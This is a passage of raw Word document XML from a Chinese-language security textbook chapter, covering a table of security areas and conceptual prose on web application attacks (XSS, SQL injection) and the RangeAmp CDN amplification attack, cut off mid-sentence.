            </w:pPr>
            <w:bookmarkStart w:id="3" w:name="OLE_LINK1"/>
            <w:bookmarkStart w:id="4" w:name="OLE_LINK2"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>云计算安全</w:t>
            </w:r>
            <w:bookmarkEnd w:id="3"/>
            <w:bookmarkEnd w:id="4"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1713" w:type="pct"/>
            <w:vMerge/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="15A2D251" w14:textId="77777777" w:rsidR="00966977" w:rsidRPr="00CC3BE6" w:rsidRDefault="00966977" w:rsidP="00966977">
            <w:pPr>
              <w:ind w:firstLine="440"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1199" w:type="pct"/>
            <w:vMerge/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="226B27A6" w14:textId="77777777" w:rsidR="00966977" w:rsidRPr="00CC3BE6" w:rsidRDefault="00966977" w:rsidP="00966977">
            <w:pPr>
              <w:ind w:firstLine="440"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1155" w:type="pct"/>
            <w:vMerge/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="03DCC3F4" w14:textId="77777777" w:rsidR="00966977" w:rsidRPr="00CC3BE6" w:rsidRDefault="00966977" w:rsidP="00966977">
            <w:pPr>
              <w:ind w:firstLine="440"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00966977" w:rsidRPr="00CC3BE6" w14:paraId="11E3F470" w14:textId="77777777" w:rsidTr="00966977">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="933" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4F328A5C" w14:textId="77777777" w:rsidR="00966977" w:rsidRDefault="00966977" w:rsidP="00966977">
            <w:pPr>
              <w:spacing w:line="480" w:lineRule="exact"/>
              <w:ind w:firstLineChars="0" w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>物联网安全</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1713" w:type="pct"/>
            <w:vMerge/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="60F2D37F" w14:textId="77777777" w:rsidR="00966977" w:rsidRPr="00CC3BE6" w:rsidRDefault="00966977" w:rsidP="00966977">
            <w:pPr>
              <w:ind w:firstLine="440"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1199" w:type="pct"/>
            <w:vMerge/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5EA89470" w14:textId="77777777" w:rsidR="00966977" w:rsidRPr="00CC3BE6" w:rsidRDefault="00966977" w:rsidP="00966977">
            <w:pPr>
              <w:ind w:firstLine="440"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1155" w:type="pct"/>
            <w:vMerge/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="04537CB6" w14:textId="77777777" w:rsidR="00966977" w:rsidRPr="00CC3BE6" w:rsidRDefault="00966977" w:rsidP="00966977">
            <w:pPr>
              <w:ind w:firstLine="440"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00966977" w:rsidRPr="00CC3BE6" w14:paraId="0366E927" w14:textId="77777777" w:rsidTr="00966977">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="933" w:type="pct"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="71252781" w14:textId="77777777" w:rsidR="00966977" w:rsidRDefault="00966977" w:rsidP="00966977">
            <w:pPr>
              <w:spacing w:line="480" w:lineRule="exact"/>
              <w:ind w:firstLineChars="0" w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>移动应用安全</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1713" w:type="pct"/>
            <w:vMerge/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="39697042" w14:textId="77777777" w:rsidR="00966977" w:rsidRPr="00CC3BE6" w:rsidRDefault="00966977" w:rsidP="00966977">
            <w:pPr>
              <w:ind w:firstLine="440"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1199" w:type="pct"/>
            <w:vMerge/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1D045923" w14:textId="77777777" w:rsidR="00966977" w:rsidRPr="00CC3BE6" w:rsidRDefault="00966977" w:rsidP="00966977">
            <w:pPr>
              <w:ind w:firstLine="440"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1155" w:type="pct"/>
            <w:vMerge/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4ADC604B" w14:textId="77777777" w:rsidR="00966977" w:rsidRPr="00CC3BE6" w:rsidRDefault="00966977" w:rsidP="00966977">
            <w:pPr>
              <w:ind w:firstLine="440"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1FADF44C" w14:textId="3B6C283E" w:rsidR="00B3713F" w:rsidRPr="0066010E" w:rsidRDefault="0066010E" w:rsidP="0066010E">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r w:rsidRPr="00B3713F">
        <w:t>13.1</w:t>
      </w:r>
      <w:r w:rsidRPr="00B3713F">
        <w:t>网络应用及其</w:t>
      </w:r>
      <w:r w:rsidRPr="00B3713F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>相关的应用安全问题</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B42E170" w14:textId="77777777" w:rsidR="00B3713F" w:rsidRDefault="00B3713F" w:rsidP="00B3713F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>本节，我们从三个方面阐述分析，应用安全问题出现的本质和共性原因是什么。首先，结合不同的网络应用，我们梳理归纳了不同网络层次面临的典型安全威胁。然后我们抽象总结了这些网络安全攻击的共性特征，即攻击成功发生所需要哪些基本条件和假设。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FCF3E09" w14:textId="2B68C2E3" w:rsidR="00B3713F" w:rsidRDefault="0066010E" w:rsidP="0066010E">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>13.1</w:t>
      </w:r>
      <w:r w:rsidR="00B3713F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">.1 </w:t>
      </w:r>
      <w:r w:rsidR="00B3713F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>各种应用的安全攻击</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C8BA985" w14:textId="3EAA7FEF" w:rsidR="00B3713F" w:rsidRDefault="00D51F46" w:rsidP="00B3713F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00B3713F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidR="00B3713F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安全</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DFAD96E" w14:textId="1E64A588" w:rsidR="00831B82" w:rsidRDefault="00831B82" w:rsidP="00B3713F">
      <w:r>
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidRPr="00831B82">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>eb</w:t>
      </w:r>
      <w:r w:rsidRPr="00831B82">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用程序</w:t>
      </w:r>
      <w:r w:rsidRPr="00831B82">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(web app)</w:t>
      </w:r>
      <w:r w:rsidRPr="00831B82">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是运行在</w:t>
      </w:r>
      <w:r w:rsidR="00F872E8">
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidRPr="00831B82">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>eb</w:t>
      </w:r>
      <w:r w:rsidRPr="00831B82">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务器上的应用软件，不同于运行在本地设备操作系统上的基于计算机的软件。用户通过具有活跃</w:t>
      </w:r>
      <w:r w:rsidRPr="00831B82">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>internet</w:t>
      </w:r>
      <w:r w:rsidRPr="00831B82">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>连接的</w:t>
      </w:r>
      <w:r w:rsidRPr="00831B82">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidRPr="00831B82">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>浏览器访问</w:t>
      </w:r>
      <w:r w:rsidRPr="00831B82">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidRPr="00831B82">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用程序。这些应用程序使用客户机</w:t>
      </w:r>
      <w:r w:rsidRPr="00831B82">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00831B82">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务器建模的结构进行编程——用户</w:t>
      </w:r>
      <w:r w:rsidRPr="00831B82">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00831B82">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>“客户端”</w:t>
      </w:r>
      <w:r w:rsidRPr="00831B82">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00831B82">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过第三方托管的离线服务器提供服务。常用的</w:t>
      </w:r>
      <w:r w:rsidRPr="00831B82">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>web</w:t>
      </w:r>
      <w:r w:rsidRPr="00831B82">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用程序示例包括</w:t>
      </w:r>
      <w:r w:rsidRPr="00831B82">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="007A0E2E">
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidRPr="00831B82">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>eb-mail</w:t>
      </w:r>
      <w:r w:rsidRPr="00831B82">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、在线零售、在线银行和在线拍卖。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F353BE" w14:textId="77777777" w:rsidR="00B3713F" w:rsidRDefault="00B3713F" w:rsidP="00B3713F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用安全是信息安全的一个分支，专门处理网站、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务的安全。在较高的层次上，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用程序安全性借鉴了应用程序安全性的原则，但具体应用于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Internet</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45E086C0" w14:textId="67439E3B" w:rsidR="00B3713F" w:rsidRDefault="00B3713F" w:rsidP="00B3713F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>大多数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>web</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用程序攻击都是通过跨站点脚本</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(XSS)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入攻击发生的，而这些攻击通常是由于编码有缺陷和未能清理应用程序输入和输出而造成的。同时攻击被列为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2009</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>年</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CWE/SANS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>最危险的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>25</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个编程错误</w:t>
      </w:r>
      <w:r w:rsidR="00052CF6">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00052CF6">
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00052CF6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:instrText>REF _Ref61078390 \r \h</w:instrText>
      </w:r>
      <w:r w:rsidR="00052CF6">
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00052CF6">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00052CF6">
        <w:t>[1]</w:t>
      </w:r>
      <w:r w:rsidR="00052CF6">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="519E4EB6" w14:textId="593CCA5B" w:rsidR="00B3713F" w:rsidRDefault="00D51F46" w:rsidP="00B3713F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00B3713F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CDN</w:t>
      </w:r>
      <w:r w:rsidR="00B3713F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安全</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="413E8996" w14:textId="571E41EF" w:rsidR="00B3713F" w:rsidRDefault="00B3713F" w:rsidP="00B3713F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CDN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Content Delivery Network, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>内容分发网络）是当前提高网站的性能、可靠性与安全性的最佳实践之一，它是由分布在不同地理位置的服务器集群组成的分布式网络，目标是帮助其客户网站实现负载均衡、降低网络延迟、提升用户体验、过滤</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入等攻击，分散拒绝服务攻击的流量。如图</w:t>
      </w:r>
      <w:r w:rsidR="00411591">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00411591">
        <w:t>3.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>所示，如果一个网站托管在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CDN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上：网站用户总是从距离自己最近的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CDN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>节点快速地获取缓存内容；当用户请求在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CDN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>缓存中缺失，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CDN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>节点会将该请求转发到源站服务器，以获取目标文件内容并将其缓存。除了负载均衡和缓存加速，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CDN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>还能够隐藏其客户网站的实际</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>地址，并为其提供</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DDoS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击保护。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="173127CC" w14:textId="56C578C0" w:rsidR="00B3713F" w:rsidRDefault="00411591" w:rsidP="00E5769A">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="52BCEA1A" wp14:editId="346DC435">
            <wp:extent cx="3950335" cy="1212850"/>
            <wp:effectExtent l="0" t="0" r="0" b="635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3950335" cy="1212850"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D65A5D" w14:textId="55DB7053" w:rsidR="00D91C98" w:rsidRDefault="00D91C98" w:rsidP="00E5769A">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>图</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">3.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CDN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>示意图</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D06A97" w14:textId="36FBC3B2" w:rsidR="00B3713F" w:rsidRDefault="00B3713F" w:rsidP="00B3713F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然而通过一些漏洞，可以通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CDN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DoS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击，从而破坏原有系统的可用性。</w:t>
      </w:r>
      <w:r w:rsidR="0083594B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>RangeAmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006D156D">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="006D156D">
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="006D156D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:instrText>REF _Ref61078521 \r \h</w:instrText>
      </w:r>
      <w:r w:rsidR="006D156D">
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="006D156D">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="006D156D">
        <w:t>[2]</w:t>
      </w:r>
      <w:r w:rsidR="006D156D">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击是一种通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CDN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DDos</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击，虽然</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CDN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>范围请求机制都致力于提升网络性能，但是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CDN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>范围请求机制的实现存在安全缺陷，使得</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CDN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的前端连接和后端连接之间产生巨大流量差异，导致潜在的流量放大攻击，攻击者能够滥用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CDN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对网站服务器或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
